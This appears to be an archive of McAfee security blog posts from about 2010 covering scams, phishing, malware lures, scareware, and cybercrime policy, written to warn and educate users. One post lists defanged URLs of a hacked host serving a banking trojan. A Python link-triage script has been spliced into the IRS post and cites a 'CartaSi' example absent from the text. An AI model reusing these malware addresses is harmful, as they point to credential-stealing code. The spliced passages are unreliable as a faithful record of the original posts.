This malicious PDF drops and executes a malicious payload detected as BackDoor-ERZ, while the malicious PDF is detected as Exploit-pdf.b with McAfee’s 6022 DATs.

McAfee, Parental Controls, and Apple Devices = Safer Kids Online

Today we announced our McAfee® Family Protection iPhone®, iPod touch® and iPad™ Edition. McAfee now provides strong parental controls to keep young people safe when they are browsing the Internet on an Apple mobile device. McAfee released McAfee Family Protection for the PC in June 2009.

According to data released by Admob in 2010, 65 percent of iPod touch users and 13 percent of iPhone users are below the age of 17. According to The Internet Safety Technical Taskforce in a December 2008 survey, twice as many kids own an Internet-enabled mobile device versus a computer.

McAfee® Family Protection iPhone, iPod touch and iPad Edition offers website and search filtering. The program will automatically block age-inappropriate sites, such as known pornography web sites, as well as filter Google search results. It also includes location tracking for Apple devices that are equipped with GPS technology.

Parents can also view usage statistics, including visited websites and access times, as well as add and remove custom websites while having the option to remotely disable all Web browsing.

From McAfee Chief CyberSecurity Mom, and my pal, Tracy Mooney:

“Many parents don’t consider online dangers when providing their kids with an iPod touch or passing on their old iPhones to them. Even if they are trying to monitor on a regular basis, it’s nearly impossible to know what they’re searching for,” said Mooney. “I’ve tried to be vigilant about checking in from time to time to see what my kids are doing online, but I know that my kids have more access now than ever with their mobile device. This product will help parents be at ease when they are equipping their kids with the latest technology.”

McAfee Family Protection iPhone, iPod touch, and iPad Edition is available for download now at the iTunes App Store and McAfee.com. For more information about McAfee mobile please visit the McAfee Mobile site.

McAfee Survey: Secret Life of Teens

Today McAfee released the results from our survey “Secret Life of Teens,” which provides a detailed snapshot of online teen behavior. It reveals that 85 percent of teens go online somewhere other than at home and under the supervision of their parents, nearly a third (32 percent) of teens say they don’t tell their parents what they do while they are online, and 28 percent engage with strangers online. The survey results should serve as a wake-up call for many parents.

Kids today are using mobile devices more than ever to get connected, which means increased opportunities for unsupervised usage. Is this a bad thing? Not necessarily, but it can become one easily. I truly believe it comes down to values. It is not that young people today do not value privacy or security but rather that they value openness much more. To protect young people, we need education and technology, both of which are firmly in the hands of us parents. Kids cannot teach themselves to be safe online.

We commissioned Harris Interactive to conduct the survey and in it we detail some pretty startling facts:

  • 69 percent of teens divulged their physical location
  • 28 percent chatted with strangers

Of those teens who chatted with strangers, defined as people whom they did not know in the offline world:

  • 43 percent shared their first name
  • 24 percent shared their email address
  • 18 percent posted photos of themselves
  • 12 percent posted their cell phone number

As the parent of a teenage girl, I found it eye-opening that girls make themselves targets more often than boys: 32% of the girl respondents indicated they chat with strangers online vs. 24% of boy respondents. Byron Acohido of The Last Watchdog has a great write-up of the report as well.

Times and technology have changed. It is very easy to be a cybercriminal and predator. Download and read this survey (I linked the copy on The Last Watchdog website). Share it with everyone you know who has children. Read it with your own children. Teachable moments are a great thing. This is a teachable moment.

Take back the Internet.

Twitter Meets Malware, Cybercriminals, and Gaza Situation

We have discussed previously that malware writers and cybercriminals read the same news that the rest of us do. They use the same tools as we do and go to the same sites we go to as well. Over the last several years we have seen cybercriminals and malware writers consistently use high-impact news events as the social lure in spams, scams, and malicious websites. Recently they have begun to set their sights on the popular social networking service Twitter; this should come as no surprise because more than 75 million people globally use the service.

The recent happenings in the Middle East simply presented cybercriminals with too good a lure to pass up: the Gaza Flotilla. It is all over the news, as a quick Google search shows.

So we did a little quick searching to see what we could find–starting with a great tool called BackTweets:

BackTweets

BackTweets is great; it lets you search Twitter for keywords and links. These very simple and quick searches gave some interesting results. Using just the words Arabs, Israel, and exe (so we could easily connect the main words to an executable program in a tweet), we got the following results, in no particular order:

BackTweets Search on

As well as:

BackTweets Search on

You might notice in the second search that there was also a bit of celebrity abuse (a common device) using some of the same tags. Both of the account profiles referenced were seemingly created just to distribute these:

Naughty Profile 1

and:

Naughty Profile 2

Looks suspicious! Especially when you check the low follower and following counts–and the files themselves linked to malware that at the time of this writing had very little detection:

Twitter-Sent Malware

With the explosion in popularity of social media and networking technologies such as Twitter we can expect to see this type of abuse skyrocket in the coming months. As more and more users take advantage of social networking platforms to get news (or other information), so will the malware writers and cybercriminals.

World Cup Serves as Bait for Cybercriminals

In a recent spam–that appeared to be a page from a popular Brazilian newspaper–we read that the Brazilian soccer team coach Dunga had been involved in an assault. He was apparently punched in the face by two angry fans who were unhappy that he had not selected two players–Neymar and Ganso–in his 23-man roster for the FIFA World Cup in South Africa this month.

Besides offering a very poorly modified picture of the coach, this scam also contained a link to pictures of the fight. (“Clique aqui e veja as fotos.”)

Brazilian Team Coach

The link, in fact, leads to another website:

hxxp://ml210-202-198-66.vdslpro.static.apol.com.tw/[REMOVED]/index.asp?

This link redirects to another website, which belongs to the Malaysian government (according to the domain .GOV.MY) and which appears to be hacked:

hxxp://kew.mida.gov.my/[REMOVED]agressao_dunga.exe

This file, which claims to contain photos related to the fight, is really a Trojan that we call PWS-Banker.gen.ad, which specializes in capturing banking credentials.

With the World Cup only nine days away, I bet we will see many more of these scams.

Oh, and I’ll also bet that Brazil will win again. ;)

Message to Google: Aurora NOT a Technology or OS Issue

The news that Google is supposedly dropping Microsoft Windows is spreading like wildfire all over the Internet today. Without getting into any “which OS is better or more secure” holy war, let’s review some facts to see if this “decision” has any basis in reality. (I caution readers to remember this is not confirmed, even if it is true.)

The supposed cause of this change is Operation Aurora, the attack that affected Google and many other companies. From the McAfee Labs Threat Center:

“Operation Aurora was a coordinated attack which included a piece of computer code that exploits the Microsoft Internet Explorer vulnerability to gain access to computer systems. This exploit is then extended to download and activate malware within the systems. The attack, which was initiated surreptitiously when targeted users accessed a malicious web page (likely because they believed it to be reputable), ultimately connected those computer systems to a remote server. That connection was used to steal company intellectual property and, according to Google, additionally gain access to user accounts.”

What many people fail to realize is that Operation Aurora was not really about any technical issues.

But you may ask “Marcus, how can you possibly say that? Have you gone mad? Aurora 0wned multiple computers on multiple networks! They were all running that evil Microsoft Windows. Surely removing Windows will solve all the problems!”

These objections are not even close to the real issue. Sure, the attackers used a very effective zero-day vulnerability. And, certainly, they used lots of evasion techniques in delivering the payload. But the real vulnerability has not been discussed.

People were the weak link.

The attackers who launched Operation Aurora knew their targets well from both corporate and personal viewpoints. They knew what their victims were running and what their roles were. The attackers even knew what application versions they used. (Ever wonder why the zero-day was limited in effectiveness to Internet Explorer Version 6 when the attack commenced? The attackers knew that was all they needed.)

The intel that the attackers gathered to make Operation Aurora work is what made it a success–not the operating system involved. The targets were the people.

Would it make any difference if the victims were running Linux or any other operating system if an attacker builds such a sophisticated profile? Not remotely. Linux, Windows, Mac, whatever–everything has weaknesses. Especially the users of those systems.

When an attacker knows the details of a company’s technical deployment and personnel to the level we saw in Operation Aurora, the difference between one operating system and another is irrelevant. Any system or network can be technically compromised. Likewise, malware can be written for any operating system.

If determined attackers and gatherers of intelligence invest the time to get to know their targets–their behaviors, likes, dislikes, technical backgrounds, job roles, etc.–the actual exploit is trivial. All they have to do is get their victims to click a link. The more they know about their targets, the more likely users will click it.

Social engineering and intelligence gathering trumps technology every time. It always has and always will.

Facebook Strengthens Logon Security

Lately Facebook has been all over the news regarding security and privacy issues. Today Facebook replied by announcing some new tools, settings, and measures to allow users to better protect their logons. In his blog, Facebook’s Lev Popov describes the new settings and features in nice detail.

In a nutshell, users now have the ability to be notified of a logon from a variety of devices. From his post:

Login Notifications

Over the last few weeks, we’ve been testing a new feature that allows you to approve the devices you commonly use to log in and then to be notified whenever your account is accessed from a device you haven’t approved. This feature is now available to everyone.

To try it out, go to the Account Settings page and click on the link next to “Account Security” at the bottom of the page. If you select the option to receive notifications for logins from new devices, when you log in you’ll be asked to name and save the various devices you use to access Facebook.

The feature itself is easy to enable: From Account Settings > Account Security you will see the following screen:

New Facebook Logon Feature!

I like that users can name and save various “devices” they use to access Facebook. If someone logs into that account from a device not on this list, Facebook will prompt that user for further information. Handy!

Facebook has also done some tuning/magic on their side to block bogus or questionable logon attempts. If they see logons from unusual devices, they will prompt those users with additional verification questions, in essence, making them prove they are who they say they are:

Suspicious Account Verification

I think these are great steps, and I am glad to see Facebook stepping it up in regards to securing account access. When you consider the high prevalence of password-stealing Trojans and Koobface (malware that targets Facebook users) these measures are certainly a move in the right direction.

More general information on what Facebook does for security can be found on their Security Page.

Ending XP Service Pack 2 and Windows 2000 security support and its implications

I was just reading Byron Acohido’s writeup on Microsoft ending security patch support for Windows XP Service Pack 2 and Windows 2000. Now, as I work for a vendor myself, I completely understand why Microsoft is going EOL (or is it EOS for end-of-support?? I forget…) for these operating systems – better, more robust OS choices exist, and no company has unlimited resources to support applications and technologies that have seen better days.

I get that, I really do. I do, however, think some larger issues certainly loom:

1. Legacy applications that will not run on higher patch builds
2. Point-of-Sale and embedded devices (think ATMs and such….), ESPECIALLY if you have a global deployment
3. Patching and upgrading is never easy anyway
4. The agility of cybercriminals

Now I will also concede that it’s relatively straightforward to compromise a fully patched system. The tools and techniques are readily and easily available if you have a browser and even limited Google search skills – but let’s also be honest: it’s WAY easier to own an older unpatched build, especially when all the vulnerabilities that XP Service Pack 2 and Windows 2000 have are so well documented and available. Malware also tends to be fairly backwards compatible in many cases.

I am not so certain this will cause a great shift in toolkits or focus of your average malware writer or cybercriminal. I DO think it is an excellent opportunity for scammers though. Just think of the spam campaigns or link spam possibilities – it’s a great lure.

“MS has stopped support for XP Service Pack 2 click here for low cost upgrades!!!”
“Your machine seems to be running Windows 2000. Click here to upgrade to Windows 7 for a low price.!”

I can see the spam runs, phishing sites and associated fake-AV installs now… Be forewarned, my friends. And is it just me, or is whitelisting and application control looking better and better??

One week as a Scam Victim

We have written several times about Internet scams. Some of the most famous scams are certainly the “Nigerian” ones, where you were supposedly the one that would receive about 1M USD to facilitate a transaction. It was even covered on Dateline! :) Other popular scams include work-from-home scams and romance scams.

So, I decided to enter into one of these work-from-home scams so I could post it here and hopefully help others at the same time. The scam itself will be separated into days for better clarification.

Day 1: The Job Proposal

I received in my personal mailbox a spam message that has been quite common, at least since mid-2009.

Some excerpts:

You could work on Part-Time basis for SINOCHEM Corporation as a FINANCE CO-ORDINATOR in the United States/Canada or its environs which requires a great deal of trust and honesty. Meanwhile, this job is 100% tax free and there is no start up cost required. I am Mr. CHEN Guogang (Chief Financial Officer, Sinochem Corporations).
JOB DESCRIPTION:
1. Receive payment from Clients.
2. Cash Payments at your Bank.
3. Deduct 10% which will be your percentage/pay on Payment processed.
4. Forward balance after deduction of percentage and pay to any of the offices you will be instructed to do so later
(Payment is to be forwarded by WESTERN UNION Money Transfer).

HOW MUCH WILL YOU EARN?

10% from each transaction! For instance: you receive 5000 USD via checks on our Behalf. You will cash the Check and keep $500 (10% of $5000) for yourself! Anyway, your commission is a constant percentage which will be subjected to an increase of 15% and above based on your efficiency in services being rendered to the company.
If interested in this job, do fill the application form below send via e-mail to: SINOCEMJOB@AOL.COM

Now, putting this message through my Mental Debugging mode:

1. The company: SINOCHEM? Is it a fake or real company?

Unlike other scams that often create a whole fake infrastructure, including a functional fake company website, this one uses a real company as the lure. Sinochem is actually one of the largest companies in China.

2. So, who is Mr. Chen Guogang? Did he REALLY send me this job offer?

Mr. Chen Guogang is also a real person and is in fact the CFO of Sinochem. Now the next logical question – did he really send the Job offer?

A couple of things to think about here. First, why would the CFO of a real company contact anyone directly by email to offer a job? Second, why would the CFO use an AOL email address? Yes, it is a scam! :)

The original email asked a couple of questions, such as name, full home address, age, phone and email…which I replied to, saying I was very thankful for the opportunity since I was unemployed…:)

Day 2: The Job Confirmation!

One day after I sent it, I received an email back with the subject Job Confirmation from the same AOL address: Chen Guogang sinocemjob@aol.com, which actually seemed to be using Gmail as the mail relay at the time.

An excerpt:

“let me personally congratulate you on your new job appointment to this noble companies,You can have my Job as a Part time one, it requires no time and can be easily done by just anyone.
I will notify you immediately funds are coming your way as I will implore you to check your email for regular updates.
It is important to confirm the receipt of every message received from us and a quick response to every update from henceforth is of high importance.”

Ok, so now I have a job! Well, a part-time job that can be done by anyone…how good for my morale! But that is ok, at least I have a job! So I replied again. :)

Day 3: It’s Pay Day!

The 3rd email exchanged was about the Payment.

The subject is: PAYMENT SENT OUT

Some excerpts:

“Your honesty and prudent maters in handling of cash, financial transaction for this company, You are to take all records of received funds and their disbursement in a log book.

Your information has been forwarded to our client that will be sending the funds and we are going to provide tracking’s numbers for the delivery of every payment and details of the package prior to the delivery date.

The payments are certified, we also have protection scheme for our staff inline of duty,actualization of company objectives and goals should be your topmost priorities.

We will notify you with the proceedings and make sure you adhere to our working rules and regulations.

The first payment should be delivered to you this week, Do keep an eye on your email in the am for the instructions to be carried out upon the receipt of the payments.”

So, after I replied to all emails and proved that I am a good and honest employee, they will now start to send me the checks!

At this point I should start to receive, at least once but possibly 2 or 3 times, fake or even fraudulent checks, of which I would keep 10% and forward the remaining 90% somewhere via Western Union. The trick here is that they required me to receive the check, deposit it into my account, keep 10% and then send 90% out…BUT ON THE SAME DAY!! This means that I would not be able to wait until the check cleared, and that is how the scam works: by the time the check bounces, my money would already be gone…

Day 4: It is Pay Back time…

Feeling that I had enough info, I decided to reply to Mr. Chen:

“ Hello Mr. Chen,

Once more, thank you for the opportunity. I was thinking here and that since I am quite low on cash, I decided to keep the first check as an advanced payment for my next services.
Hope that it works!”

Unfortunately I didn’t receive any email back after this one…I guess I was fired…:)

Dark and Stormy–Comeback of a Botnet?

Rumors that made the rounds over the last several days turned out to be true: The infamous Storm botnet is being rebuilt using new variants of the malware that actually resemble the functionality of older Trojans!

Back “in the day,” the Storm botnet was one of the biggest botnets, sending out vast amounts of spam. As the market leader in spam-distributing botnets, it got a lot of attention from the security industry and the general public, ultimately leading to its demise. Since early 2009 the botnet was believed to be silent, even possibly defunct.

The new malware has been distributed widely over the last several days, and the new botnet is already sending out spam. In an analysis by Mark Schloesser, Tillmann Werner, and Felix Leder, German researchers who did a lot of work in analyzing the original Storm, they found that around two-thirds of the “new” functions are a copy and paste from the last Storm code base. What is missing is the original peer-to-peer (P2P) functionality, possibly in response to a tool these researchers developed that could bring down Storm. Cutting away the P2P functionality restricts the new Storm variants to HTTP communication with their command server.

This change basically means that the new botnet is “just” another botnet among the many thousands active today–with nothing special except the relationship with its notorious predecessor. However, the group running Storm has proven to be very resourceful in the past. And while it’s not clear if it is the same group, or another group reusing their code, we will certainly monitor this threat carefully.

So hopefully “Dark and Stormy” will remain my favorite drink rather than a prediction of what the future looks like for Storm.

Surrounded by Malicious PDFs

Malicious PDF files and related exploits are invading the Net. Looking at the CVE records in the National Vulnerability Database for Adobe products, we see a dramatic increase in 2009.

Since January 1, Adobe vulnerabilities have continued to appear. During this period, five are classified as medium, while about 30 are judged high-level threats.

Now we find the Zeus botnet is also taking advantage of a PDF flaw. This vulnerability, along with about 15 others, is now covered by the recent patch (APSB10-09).

In 2007 and at the beginning of 2008 most of the exploit samples in our malware collections were linked to HTML/iframe, WMF, or DCOM vulnerabilities.

Today malware involving malformed PDF files is legion. From less than 2 percent of malware directly connected to exploits in 2007 and 2008, such files reached 17 percent in 2009 and 28 percent during the first quarter of 2010. For Adobe Reader software, 2010 seems to be the year of living dangerously.

Phishing Attacks Target Twitter Users

A new attack on Twitter users has been arriving as spam with a phishing link. It appears as a notification about an unread message from Twitter Support with a subject line such as “Twit 73-923.” The ending number can vary. The body of the message includes “You have [some number of] delayed message(s) from Twitter” and a link to a phishing site.

Twitter Phishing

If you receive one of these emails, make sure to check where the link points to before clicking on it. To visit a page such as this (or any page even), it’s much safer to manually type the web address instead of clicking a link in an email. Links can easily be faked!

More Twitter Phishing

Users without protection who click on any of these links could infect their PCs or reveal their Twitter credentials.

We recommend you take advantage of either or both of McAfee’s TrustedSource™ reputation system and SiteAdvisor Technology to protect yourself against malicious phishing attacks and the sites that host them.

Even More Twitter Phishing

Yet Even More Twitter Phishing!!

Tweet, search and surf safely out there!

Familiar Rip-Off Strikes Apple, IKEA

As I write this blog today, a number of fabulous offers are spreading on Twitter, Facebook, and the Internet. They promise you a free Apple iPad, a free $1,000 IKEA gift card, and other incredible presents to lure people in search of a bargain. Indeed, reports say that the IKEA gift card scam took in nearly 40,000 Facebook users on April 12, and a similar offer fooled 70,000 victims in March.

Be careful: All these offers are fake. They exist only to collect personal data–your name, address, and e-mail–for future spam campaigns. They also take you to various lottery websites, where you are tempted to deposit funds for playing online instant and scratch games. I followed about 10 such offers; they all end at the same websites, chosen according to your country. Once there, you do not see any trace of the initial proposal (the iPad or gift card). To keep your interest, various windows and pop-ups announce numerous winners. To join them you need only an account and a deposit of some money.

For sure, these offers lure many people. Since the beginning of this dishonest advertising campaign, traffic to these dubious online casinos has shot up.

As I searched for an explanation, I contacted an employee via a chat window. I explained I was always redirected by these dubious advertising offers (the your-free-apple-ipod URL, for example) to their casino after I gave my contact details. Of course, the person responding did not give me any explanation. “Are you interested by our games?” she asked. “Please register, we will offer you 5 euros. Otherwise, have a good day.” And she ended with a smile.

In France, online casino games are less numerous and less frequented than in the United States, but interest in these spare-time activities is increasing. From both sides of the ocean, I recommend you limit yourself to well-known and registered institutions.

Scams Increase During U.S. Tax Season

Scams based on the United States Internal Revenue Service requirements increase every year during tax season. It’s common to see online threats and tactics in which identity thieves and hackers try to convince taxpayers to reveal their personal and financial information. This year is no exception.

Researchers at McAfee Labs continuously monitor threats to best protect our customers. We have identified a cluster of fake IRS URLs. Victims might visit these phishing and malicious websites via any number of effective redirection methods: phishing attacks, forum postings, and black-hat search-engine optimizations, among others. However, a few simple precautions will help you avoid identity theft during tax season. If you get an email from the IRS, it’s probably a scam. The IRS does NOT usually contact taxpayers via email. Avoid replying or clicking on links that take you to suspicious sites. You should delete these messages.


The numbers of fake irs.gov domains hosting phishing sites already surpass last year’s:


McAfee customers are protected from malicious sites with high-risk reputations thanks to our TrustedSource technology.

Here is an example of how McAfee SiteAdvisor Technology and the McAfee TrustedSource™ reputation system protect users from cyberfraudsters. Malicious phishing attacks are blocked when they try to steal consumers’ information:


The IRS Consumer Alert page says “The IRS does not send taxpayers unsolicited email about their tax accounts, tax situations, or personal tax issues.” To verify whether the IRS is trying to contact you, call the agency.
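The advice above (check where a link really points, and be wary of the fake irs.gov domains) and the CartaSi clone served straight from an IP address come down to one check: does the link's registrable domain belong to the brand the message claims? The following is an added example, not McAfee's code; the brand table and the tiny public-suffix set are constructed for the hosts in these posts, and it also undoes the hxxp:// defanging used in write-ups.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Legitimate registrable domains for the brands the lures above impersonate
# (constructed table: the posts name the brands, the domains are their public ones).
BRAND_DOMAINS = {
    "irs": "irs.gov",
    "cartasi": "cartasi.it",
    "twitter": "twitter.com",
}

# Two-label public suffixes needed for the hosts in these posts. Constructed and
# deliberately small; a real deployment would load the Public Suffix List.
TWO_LABEL_SUFFIXES = {"gov.my", "com.tw", "co.uk"}


def normalize(url: str) -> str:
    """Undo the hxxp:// defanging used in write-ups and supply a scheme if absent,
    so urlsplit() parses the host instead of treating everything as a path."""
    url = url.strip()
    url = re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.IGNORECASE)
    if "://" not in url:
        url = "http://" + url
    return url


def registrable_domain(host: str) -> str:
    """Return the part of the host an attacker would have had to register:
    the last two labels, or three when the last two form a known public suffix."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def is_ip_literal(host: str) -> bool:
    """True for a bare IPv4/IPv6 host, as used by the CartaSi clone above."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def triage_link(url: str, claimed_brand: str):
    """Classify a link from a message that claims to come from `claimed_brand`.

    Returns (accepted, reason). Only the brand's own registrable domain is
    accepted; each lookalike trick gets its own reason so an analyst can see
    what was attempted.
    """
    expected = BRAND_DOMAINS[claimed_brand]
    parts = urlsplit(normalize(url))
    host = parts.hostname or ""

    if not host:
        return False, "no host in link"
    if is_ip_literal(host):
        return False, "raw IP host instead of %s" % expected
    if parts.username:
        # http://brand.example@evil.example/ shows the brand before the @ sign,
        # but the browser connects to the host after it.
        return False, "user-info prefix hides the real host"

    domain = registrable_domain(host)
    if domain == expected:
        return True, "registrable domain is %s" % expected

    brand_token = expected.replace(".", "-")
    if expected in host or brand_token in host:
        # irs.gov.refund-status.example: the real name is only a subdomain.
        return False, "lookalike host %s (registrable domain %s)" % (host, domain)
    if expected in parts.path.lower():
        return False, "brand name only appears in the path of %s" % domain
    return False, "unrelated domain %s" % domain


if __name__ == "__main__":
    # Constructed samples modelled on the lures described in these posts.
    for link, brand in [
        ("hxxp://irs.gov/refund", "irs"),
        ("http://irs.gov.refund-status.example/", "irs"),
        ("http://192.0.2.10/cartasi/login", "cartasi"),
        ("http://twitter.com@evil.example/messages", "twitter"),
    ]:
        print(link, "->", triage_link(link, brand))
```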

Cooperation Grows in Fight Against Cybercrime

Last week in Strasbourg, France, the Council of Europe organized the Octopus Interface Conference 2010. More than 300 experts from all over the world, representing governments, law enforcement authorities, international organizations, and the Internet industry gathered to discuss the “Cooperation Against Cybercrime.”

On Tuesday, in the opening session, Maud de Boer-Buquicchio, Deputy Secretary General of the Council, reminded the attendees that the international principles of human rights and the rule of law must apply online as well as offline. In this way, the Internet itself is now increasingly considered a basic right. But in this new environment cybercrime is a greater concern than ever; it threatens those rights. Security and the protection of rights are the responsibility of both public authorities and private-sector organizations. After a panel discussion run by countries engaged in the fight against cybercrime, Alexander Seger discussed the Budapest Convention on Cybercrime. Currently used by more than 100 countries around the world, it is the first international treaty on crimes committed via the Internet and other computer networks, dealing particularly with infringements of copyright, computer-related fraud, child pornography, and violations of network security.

Seger recommended the implementation of the convention worldwide to boost legislative reforms already underway in a large number of countries. Nations should consider adopting the policies to make use of the international cooperation provisions of this treaty. Increasing consensus on this treaty as a common framework of reference helps mobilize resources and create partnerships among public- and private-sector organizations. As a result, the ratification of the Budapest Convention by Azerbaijan, Montenegro, and Portugal prior to and during the conference, and the expressions of interest from Argentina and other countries, serve as examples to other countries.

In the afternoon, I joined a workshop on law enforcement responsibilities. Here, police units from various countries presented their services and discussed their local laws against cybercrime. I was particularly interested, as many of them discussed trends on this matter. In 2009, the Romanian National Police indexed 102 cases (indictments) with 766 offenses, 482 people charged, and 289 people arrested. In that country, 80 percent of IT fraud and phishing attacks are aimed at United States citizens, whereas 80 percent of credit card fraud (skimming) targets West European citizens. In Turkey, the Organized Crime Department (KOM) made 2,871 arrests in 2009.

However, these figures represent only a small part of the fraud that is committed. In many cases, nobody files a complaint. After fraud is committed and reported, the bank refunds its conned client via their insurance company. The bank is well insured and the victim is compensated. As for the insurance company, its profit is barely affected. There is no need to alert the authorities.

In the second part of this workshop, people from the FBI and SOCA presented three objectives for law enforcement as well as recommendations for ICANN:

  1. Due Diligence: ICANN needs to vet potential registrars and registries, through checks of international databases to ascertain an organization’s good standing. Registrars need to validate data received at the time of domain name registration and periodically thereafter.
  2. WHOIS: Accurate and public WHOIS is essential. The proxy/privacy registrations have to be limited for private individuals for noncommercial purposes. Companies providing services should be accredited by ICANN.
  3. Transparency and accountability: Domain name resellers and all third-party beneficiaries must be held to the same terms and conditions as registrars. ICANN should require all registrars, registries, proxy services, resellers, and all third-party beneficiaries of any contracts or policies of ICANN to publicly display ownership, parent companies, subsidiaries, and business associations.

On Wednesday, I participated in the mapping networks and initiatives workshop. Here, various organizations dealing with cybercrime presented their objectives and initiatives. Among them was Inhope’s fight against illegal content (child sexual abuse images, extreme violence, racism and xenophobia, bestiality, online hate and xenophobia websites, adult pornography). Looking at their map representing countries saying “no” to illegal content, the audience realized that there is a long way to go:

In the next workshop, dedicated to technical assistance against cybercrime, two talks grabbed my attention. The first one exposed the situation in India. In this country, only about 10 percent of all cybercrimes committed are actually reported, and fewer than 2 percent result in a conviction. Nevertheless, 30 million judicial actions are pending. The Indian people purchase seven million mobile phones monthly. A large number do not have any traceability mechanism. This is a golden opportunity for terrorists who can use these phones without fear. 

The second talk was given by my colleague Greg Day, Director of Security Strategy for Europe, the Middle East, and Africa at McAfee. He presented various initiatives that industry can use to share intelligence and drive knowledge transfer. Besides training sessions and the direct line to McAfee Labs offered to various police crime units around the world, Day focused on the Industry Connections Security Group (ICSG). This outfit gathers computer security entities to work on common goals and industry issues. Day sees that cybercriminals have leveraged the underground economy to gain economies of scale and access to specialist tools and services, whereas the security industry has generally responded to threats as individual entities. To tackle this problem, security professionals established the ICSG, under the umbrella of the IEEE Standards Association, to pool their experiences and resources in response to the systematic and rapid rise in new malware being introduced to the market.

The last workshop I attended was on Thursday morning. We discussed cloud computing and the law enforcement challenges introduced by this new environment. Christian Aghroum, chief of the French National Unit for Countering Cybercrime, explained the threats facing data and services that are stored somewhere in the “Internet cloud.” His talk was a fitting conclusion for these three days in Strasbourg. Although there are no borders on the Net, the concept of national sovereignty keeps on confronting us. Human rights are acknowledged around the world, international maritime or air rights are usually respected, yet there is no universal right for the extra dimension that is the Internet. Unfortunately the Budapest Convention is far from accepted by all countries worldwide. In everyday police work, this produces a huge gap that greatly favors criminals. If a French neo-Nazi website is hosted in the United States, France really has little possibility of shutting it down. If a company leaves a foreign country after some diplomatic issues, there is no guarantee to ensure the security of its data stored in the cloud. Today, in some cases, we cannot maintain security in our country because of the start of cloud-based services. In one or two years, this will be worse in the “absolute cloud,” which will have no borders. If international laws are not rapidly created, based on the Budapest Convention, the problems will certainly become worse.  

Before ending this post, I have to mention the Nigerian delegation, which offered us a song made by famous Nigerian singers. “Maga No Need Pay!” denounces fraud. (Maga is the Nigerian word for victims of fraud.) To the Nigerian people, the song explains that fraud is not the right way toward a better life. To the rest of the world, it explains that Nigeria is a great country that should not be considered solely corrupt.

Cybercrime must be fought with laws and technology, but it can be also fought with music.

The clip is viewable here.

Cybercrime and Hacktivism in the Headlines

All over the world, individuals and many organized crime and mafia groups have found that the Internet can help them make a lot of money. Others are motivated by ideology: Manipulated by or acting in accordance with an ethos, they conduct illegal activities against institutions or individuals they consider the “enemy.” Far removed from the isolated individuals acting simply irresponsibly or for amusement, these two groups constitute the double threat we know today as cybercrime and hacktivism.

Last week we published a new report that looks, in great depth, at this phenomenon. The main goal is to explain how these organized groups have become established and what the extent of their activities are. In the first part of this report, after offering some definitions, we present some of the major participants who simply cannot be ignored. The second part deals with various topics including cybercrime and hacktivism, economics, politics, culture, and others. Each topic is illustrated with examples found in the news. Through other examples, the third part of the document deals with prices and the return on investment criminals can expect.

Chinese, Japanese, and Brazilian Portuguese versions are also available from the McAfee Labs Technical White Papers web page.

‘March Madness’ Malware Spreading via Search Results

This is the time of year when basketball fans go online to fill out their bracket selections. While fans are playing with their brackets, hackers are also playing their own game of “spamdexing,” manipulating search results to promote, in this case, malware-infected sites.

At the time of this posting, top search results for terms such as ncaa bracket and march madness predictions are already poisoned. Five out of the first ten hot searches on Google Trends, with ncaa+bracket+blank taking second place, are being promoted by a network of legitimate sites that were hacked to serve malware.

Trending Search Terms

Let’s look at the bracket-related malware site. Our investigations reveal the site has an embedded Flash file that downloads malware from another site and installs without user interaction. Who would have thought that a simple, harmless-looking site with only a bunch of March Madness-related texts as content and not even a single pop-up or web ad could be that dangerous?

March Madness Malware Sites

NCAA Malicious Site

This simple yet very sneaky and effective technique of downloading malware through exploitation, also called a “drive-by download,” will surely infect a lot of users, especially users with no virus and malware protection. To reduce the chance of getting infected by this type of site, we recommend using our SiteAdvisor technology, a free browser plug-in that shows site ratings with search results. And, as always, make sure your anti-malware software is up to date and properly configured!

Facebook Suffers ‘Password Reset’ Scam

Today has been quite a busy day for scammers. We at McAfee Labs have been tracking a global scam/spam run that targets Facebook users. The lure used in the run is a familiar one:

Facebook Password Reset Confirmation! Customer Support.

The email looks like the following:

Facebook Email Scam

The activity on this particular scam run has been global from the beginning, and thanks to our Artemis “cloud” technology we have dealt with it very efficiently. The malware in the attachment is pretty much what one would expect: downloaders, password-stealing Trojan, fake-AV, or bot stuff, depending on which one you got. Check out the Artemis map of this malware:

Global Artemis Activity

To give you an idea of the scope of the run, it reached as high as No. 6 (!) on our Global Virus Map’s Top 10, which tracks consumer detections worldwide. It even accounts for as much as 10 percent of the infected email that our managed email SaaS unit is seeing. From the looks of the spams themselves they may be associated with the Cutwail or Rustock botnets, but that analysis is still ongoing.

As we had previously discussed in our 2010 Threat Predictions, social networking sites will continue to be a favorite social engineering lure for cybercriminals to distribute malware. Make sure you are protected and educated.

You can submit information about any fake Facebook email to the Facebook Security Team. Facebook also has a great security page that I recommend to all Facebook users.

‘Scareware’ Poses Danger to Consumers

On March 9 McAfee warned consumers that “scareware,” or fake anti-virus software, may be the most costly online scam in 2010, causing significant monetary loss and damage to users’ computers. In this blog, I’ll give you some additional details about the figures we cited last week in McAfee’s new Consumer Threat Alert program.

Apart from the scareware files themselves, many malware that aid rogue anti-virus programs in attacking computers are grouped into the fake-alert Trojan family. As shown in the following graph, their number exploded in 2009. To give you some idea of the rapid growth, from March 1 to March 10, 45,000 new FakeAlert samples entered in our malware collection!

Between January 2004 and December 2009, I cataloged more than 3,000 scareware software “products” created by various rogue companies. Many of them have a short life cycle (some weeks, some months), while others, some created in 2004, are still available on the web. For half of them (see next table) we were able to extrapolate the year they appeared. Their number surpassed 100 for the first two months of 2010.

Year of appearance    Scareware products
2004                  142
2005                  124
2006                  134
2007                  138
2008                  302
2009                  689
January 2010          66
February 2010         46

For many of these “products,” only the name changes. This trick maximizes a malware developer’s chances to catch victims. The scareware companies create website after website with a single rogue offer repeated under various names.

Fake-alert malware and scareware software are numerous. But scareware companies are restricted in number, perhaps between 30 and 50. The names change, but the managers remain the same. They create many subsidiaries and recruit affiliates. For more than 2,000 of these products, I was able to map them to the companies that distribute them. To avoid possible legal hassles as well as personal trouble, I will not give you the names, but the following table speaks for itself.

Company         Products distributed
Company N°1     > 1,000
Company N°2     > 150
Company N°3     > 100
Company N°4     > 100
Company N°5     > 50
Company N°6     > 30
